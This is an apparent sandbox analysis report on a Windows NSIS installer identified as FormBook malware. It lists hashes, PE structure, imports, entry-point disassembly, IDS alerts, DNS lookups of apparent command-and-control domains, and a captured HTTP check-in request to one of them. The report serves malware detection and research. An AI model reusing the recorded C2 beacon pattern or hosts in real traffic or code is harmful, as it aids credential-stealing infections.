Preview:	#VE~~'.".">)(...~M..Mi.^M..Mi.&.v~..r.~~~.J~}.B}.N..v.&o~~~..V.'R}.B}.N..v.&&~~~....'.}.B}.N..v.&.~~~....'.}.B}.N..v.&.~~~....'...NZ.4.F..YY.B...^.':..N.&Z....&.."..&..r.Z....N.u+..&Y'r.Z...r.(.J.:...&~~~~.Z.W..r}.V.}..}.;.}.;.}.^.}.&..H.N...Bu....J.. {..}.V;...FMW...Y.r&~~~~...Z.~~~.Z.?...J.........7.B~'."..M..Mi.v..F.~1.B....F.~..N.j..'v...Z..r..F.~>..F.{..v.'r.7.B~.ht..&.\|~~&.\|~~.j~..}].&.\|~~&.\|~~.F~.?..&\|~~&.\|~~.F~'.".".M..Mi.&..vN~~~..V..r..v~.h..r.~~..r>..r..v...v!:&jW~~.....F..F..~..?V.?R..&..F.[~..?V.?R.\|.F..~..WV...}].&.{~~.&.o}}..J!M..&.}.F&.}}}..J..J~.X..~!E...{~~~....7.Z~'.".">M..Mi.&..v.~~~.....r..v~.h..r.~~..r>..r..v...v!:&.Z~~.M..~~~..F..F..~..?..?...B..F.[~..?..?...N..F.[..?..?...j...F..Y..g...g...&..F.[\|..?..?..W.F..~..W...ht..&8~~~.&9r}}..J...~.F..&....{!.}..}.j}.N}.B}.F&5p}}..J..J~.X..~!E...{~~~....7.j~'."."...vN~~~..:..r..v~.h..r.~~..r>..r..v...v!:&.Y~~.....F..F..~..?:.?&..B..F.[~..?:.*?&.\|.F..~..W:..?..&.~~~.&.r}}..J!@}.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.929169191733211
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HIRE SOA FOR DEC_2021.exe
File size:	253198
MD5:	d8af2363d5a46336733b6121c0b4cf0e
SHA1:	fcb0ee44436230d924b2550fc9935ee76f2498fe
SHA256:	2a4415721925c12ce8a80719697ffbda5daf88fe34804b0549bc5d5605790cdb
SHA512:	e34f724dc4a7837ff86ed5d5214e1ed22e5643bbd45f881066b05b4ae4766a6330a48db8e4ef8dcee9ca8bf5ace43d987a667f62ea086992d2ff1ee24875889d
SSDEEP:	6144:owKROwSVj01uIkVhb9ES64sucmuklkdjrxadrJfTu2taM:KOHVBVhbmqHGkopapJfTu2taM
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007FBC3045E820h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007FBC3045E4D7h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007FBC3045E4C5h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007FBC3045BCECh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FBC3045DFB8h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FBC3045BD45h
cmp cl, 00000020h
jne 00007FBC3045BCE8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FBC3045BCDCh
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x900	0xa00	False	0.409375	data	3.94693169534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-13:43:52.418301	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.2.4	15.197.142.173
01/28/22-13:43:52.418301	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.2.4	15.197.142.173
01/28/22-13:43:52.418301	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49795	80	192.168.2.4	15.197.142.173
01/28/22-13:43:52.615356	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49795	15.197.142.173	192.168.2.4
01/28/22-13:44:03.940446	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49800	80	192.168.2.4	154.212.212.21
01/28/22-13:44:03.940446	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49800	80	192.168.2.4	154.212.212.21
01/28/22-13:44:03.940446	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49800	80	192.168.2.4	154.212.212.21
01/28/22-13:44:19.805943	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49826	34.102.136.180	192.168.2.4
01/28/22-13:44:24.890101	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.2.4	142.250.203.115
01/28/22-13:44:24.890101	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.2.4	142.250.203.115
01/28/22-13:44:24.890101	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49827	80	192.168.2.4	142.250.203.115

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 13:43:26.571491003 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.588496923 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.589521885 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.589901924 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.606714010 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629261971 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629290104 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629317999 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629342079 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629359961 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629431963 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.629489899 CET	80	49767	104.21.86.185	192.168.2.4
Jan 28, 2022 13:43:26.629543066 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.629570007 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:26.629637003 CET	49767	80	192.168.2.4	104.21.86.185
Jan 28, 2022 13:43:36.835757017 CET	49792	80	192.168.2.4	160.153.136.3
Jan 28, 2022 13:43:36.862999916 CET	80	49792	160.153.136.3	192.168.2.4
Jan 28, 2022 13:43:36.863120079 CET	49792	80	192.168.2.4	160.153.136.3
Jan 28, 2022 13:43:36.863276958 CET	49792	80	192.168.2.4	160.153.136.3
Jan 28, 2022 13:43:36.890353918 CET	80	49792	160.153.136.3	192.168.2.4
Jan 28, 2022 13:43:36.892522097 CET	80	49792	160.153.136.3	192.168.2.4
Jan 28, 2022 13:43:36.892564058 CET	80	49792	160.153.136.3	192.168.2.4
Jan 28, 2022 13:43:36.892697096 CET	49792	80	192.168.2.4	160.153.136.3
Jan 28, 2022 13:43:36.892810106 CET	49792	80	192.168.2.4	160.153.136.3
Jan 28, 2022 13:43:36.919744015 CET	80	49792	160.153.136.3	192.168.2.4
Jan 28, 2022 13:43:47.083198071 CET	49794	80	192.168.2.4	52.6.230.169
Jan 28, 2022 13:43:47.222182035 CET	80	49794	52.6.230.169	192.168.2.4
Jan 28, 2022 13:43:47.222388983 CET	49794	80	192.168.2.4	52.6.230.169
Jan 28, 2022 13:43:47.222440958 CET	49794	80	192.168.2.4	52.6.230.169
Jan 28, 2022 13:43:47.361347914 CET	80	49794	52.6.230.169	192.168.2.4
Jan 28, 2022 13:43:47.363614082 CET	80	49794	52.6.230.169	192.168.2.4
Jan 28, 2022 13:43:47.363637924 CET	80	49794	52.6.230.169	192.168.2.4
Jan 28, 2022 13:43:47.363796949 CET	49794	80	192.168.2.4	52.6.230.169
Jan 28, 2022 13:43:47.363838911 CET	49794	80	192.168.2.4	52.6.230.169
Jan 28, 2022 13:43:47.503143072 CET	80	49794	52.6.230.169	192.168.2.4
Jan 28, 2022 13:43:52.399549007 CET	49795	80	192.168.2.4	15.197.142.173
Jan 28, 2022 13:43:52.418032885 CET	80	49795	15.197.142.173	192.168.2.4
Jan 28, 2022 13:43:52.418118000 CET	49795	80	192.168.2.4	15.197.142.173
Jan 28, 2022 13:43:52.418301105 CET	49795	80	192.168.2.4	15.197.142.173
Jan 28, 2022 13:43:52.436683893 CET	80	49795	15.197.142.173	192.168.2.4
Jan 28, 2022 13:43:52.615355968 CET	80	49795	15.197.142.173	192.168.2.4
Jan 28, 2022 13:43:52.615385056 CET	80	49795	15.197.142.173	192.168.2.4
Jan 28, 2022 13:43:52.615587950 CET	49795	80	192.168.2.4	15.197.142.173
Jan 28, 2022 13:43:52.615655899 CET	49795	80	192.168.2.4	15.197.142.173
Jan 28, 2022 13:43:52.634027958 CET	80	49795	15.197.142.173	192.168.2.4
Jan 28, 2022 13:43:58.215841055 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.333755016 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:43:58.333899021 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.334042072 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.453200102 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:43:58.453345060 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:43:58.453385115 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:43:58.453522921 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.453612089 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:43:58.453705072 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.467691898 CET	49796	80	192.168.2.4	212.1.210.76
Jan 28, 2022 13:43:58.585381985 CET	80	49796	212.1.210.76	192.168.2.4
Jan 28, 2022 13:44:03.659889936 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:03.940198898 CET	80	49800	154.212.212.21	192.168.2.4
Jan 28, 2022 13:44:03.940315962 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:03.940445900 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:04.448020935 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:04.557204962 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:04.729449987 CET	80	49800	154.212.212.21	192.168.2.4
Jan 28, 2022 13:44:04.838773012 CET	80	49800	154.212.212.21	192.168.2.4
Jan 28, 2022 13:44:04.838869095 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:05.036750078 CET	80	49800	154.212.212.21	192.168.2.4
Jan 28, 2022 13:44:05.036820889 CET	49800	80	192.168.2.4	154.212.212.21
Jan 28, 2022 13:44:05.317188025 CET	80	49800	154.212.212.21	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 13:43:26.540118933 CET	55854	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:26.565443993 CET	53	55854	8.8.8.8	192.168.2.4
Jan 28, 2022 13:43:36.675570011 CET	63153	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:36.697244883 CET	53	63153	8.8.8.8	192.168.2.4
Jan 28, 2022 13:43:41.922106028 CET	52991	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:41.950030088 CET	53	52991	8.8.8.8	192.168.2.4
Jan 28, 2022 13:43:46.968595982 CET	53700	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:47.081892014 CET	53	53700	8.8.8.8	192.168.2.4
Jan 28, 2022 13:43:52.373795033 CET	51726	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:52.398015976 CET	53	51726	8.8.8.8	192.168.2.4
Jan 28, 2022 13:43:58.174300909 CET	56794	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:43:58.214751005 CET	53	56794	8.8.8.8	192.168.2.4
Jan 28, 2022 13:44:03.486622095 CET	56621	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:44:03.658027887 CET	53	56621	8.8.8.8	192.168.2.4
Jan 28, 2022 13:44:09.469520092 CET	64078	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:44:09.585433960 CET	53	64078	8.8.8.8	192.168.2.4
Jan 28, 2022 13:44:14.590650082 CET	64801	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:44:14.619923115 CET	53	64801	8.8.8.8	192.168.2.4
Jan 28, 2022 13:44:19.639933109 CET	61721	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:44:19.670660019 CET	53	61721	8.8.8.8	192.168.2.4
Jan 28, 2022 13:44:24.810468912 CET	51255	53	192.168.2.4	8.8.8.8
Jan 28, 2022 13:44:24.871097088 CET	53	51255	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 13:43:26.540118933 CET	192.168.2.4	8.8.8.8	0xc41e	Standard query (0)	www.fjallravenz.online	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:36.675570011 CET	192.168.2.4	8.8.8.8	0x1b7	Standard query (0)	www.mmfirewood.net	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:41.922106028 CET	192.168.2.4	8.8.8.8	0x3846	Standard query (0)	www.estateglobal.info	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:46.968595982 CET	192.168.2.4	8.8.8.8	0xeb46	Standard query (0)	www.simonhaidomous.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:52.373795033 CET	192.168.2.4	8.8.8.8	0x43ba	Standard query (0)	www.spacebymeghan.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:58.174300909 CET	192.168.2.4	8.8.8.8	0x7245	Standard query (0)	www.akshayaasri.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:03.486622095 CET	192.168.2.4	8.8.8.8	0x17c3	Standard query (0)	www.morethanmummies.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:09.469520092 CET	192.168.2.4	8.8.8.8	0x8cf8	Standard query (0)	www.com-weekly.email	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:14.590650082 CET	192.168.2.4	8.8.8.8	0xb26e	Standard query (0)	www.cefseguranca-app.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:19.639933109 CET	192.168.2.4	8.8.8.8	0xd4c5	Standard query (0)	www.toraportal.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:24.810468912 CET	192.168.2.4	8.8.8.8	0xe94a	Standard query (0)	www.skworkforce.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 13:42:26.524518967 CET	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:26.565443993 CET	8.8.8.8	192.168.2.4	0xc41e	No error (0)	www.fjallravenz.online		104.21.86.185	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:26.565443993 CET	8.8.8.8	192.168.2.4	0xc41e	No error (0)	www.fjallravenz.online		172.67.223.184	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:36.697244883 CET	8.8.8.8	192.168.2.4	0x1b7	No error (0)	www.mmfirewood.net	mmfirewood.net		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:36.697244883 CET	8.8.8.8	192.168.2.4	0x1b7	No error (0)	mmfirewood.net		160.153.136.3	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:41.950030088 CET	8.8.8.8	192.168.2.4	0x3846	Name error (3)	www.estateglobal.info	none	none	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:47.081892014 CET	8.8.8.8	192.168.2.4	0xeb46	No error (0)	www.simonhaidomous.com	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:47.081892014 CET	8.8.8.8	192.168.2.4	0xeb46	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:47.081892014 CET	8.8.8.8	192.168.2.4	0xeb46	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		52.6.230.169	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:47.081892014 CET	8.8.8.8	192.168.2.4	0xeb46	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		52.0.85.145	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:52.398015976 CET	8.8.8.8	192.168.2.4	0x43ba	No error (0)	www.spacebymeghan.com	spacebymeghan.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:52.398015976 CET	8.8.8.8	192.168.2.4	0x43ba	No error (0)	spacebymeghan.com		15.197.142.173	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:52.398015976 CET	8.8.8.8	192.168.2.4	0x43ba	No error (0)	spacebymeghan.com		3.33.152.147	A (IP address)	IN (0x0001)
Jan 28, 2022 13:43:58.214751005 CET	8.8.8.8	192.168.2.4	0x7245	No error (0)	www.akshayaasri.com	akshayaasri.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:43:58.214751005 CET	8.8.8.8	192.168.2.4	0x7245	No error (0)	akshayaasri.com		212.1.210.76	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:03.658027887 CET	8.8.8.8	192.168.2.4	0x17c3	No error (0)	www.morethanmummies.com		154.212.212.21	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:09.585433960 CET	8.8.8.8	192.168.2.4	0x8cf8	Server failure (2)	www.com-weekly.email	none	none	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:14.619923115 CET	8.8.8.8	192.168.2.4	0xb26e	Name error (3)	www.cefseguranca-app.com	none	none	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:19.670660019 CET	8.8.8.8	192.168.2.4	0xd4c5	No error (0)	www.toraportal.com	toraportal.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:44:19.670660019 CET	8.8.8.8	192.168.2.4	0xd4c5	No error (0)	toraportal.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 28, 2022 13:44:24.871097088 CET	8.8.8.8	192.168.2.4	0xe94a	No error (0)	www.skworkforce.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:44:24.871097088 CET	8.8.8.8	192.168.2.4	0xe94a	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.fjallravenz.online

www.mmfirewood.net

www.simonhaidomous.com

www.spacebymeghan.com

www.akshayaasri.com

www.morethanmummies.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49767	104.21.86.185	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 13:43:26.589901924 CET	1732	OUT	GET /cxep/?oL08qf=sGuO4U2D4QpvxfM4Tie03jNQ5o3Udlnj3BRVJisDJxm1gCdwebUZDD2ARlBl478rs+gp&r4e=MFQPj4OXxHZ8i HTTP/1.1 Host: www.fjallravenz.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 28, 2022 13:43:26.629261971 CET	1733	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 12:43:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cH2e6Df%2BIN%2BD3HIfng%2BVXFJrXJ5sXtwrqG6sujAnrFxhvT1Yq8%2Fdsu5K36a8s3PvbnO0g7bpap3DF476kMnjAtFUA%2Bo1ZOGDVbHr2VmeZzabOlgEjgfqcpjFaErmm6llalP4ASReqBov"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6d4a4e733f4e916e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 31 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 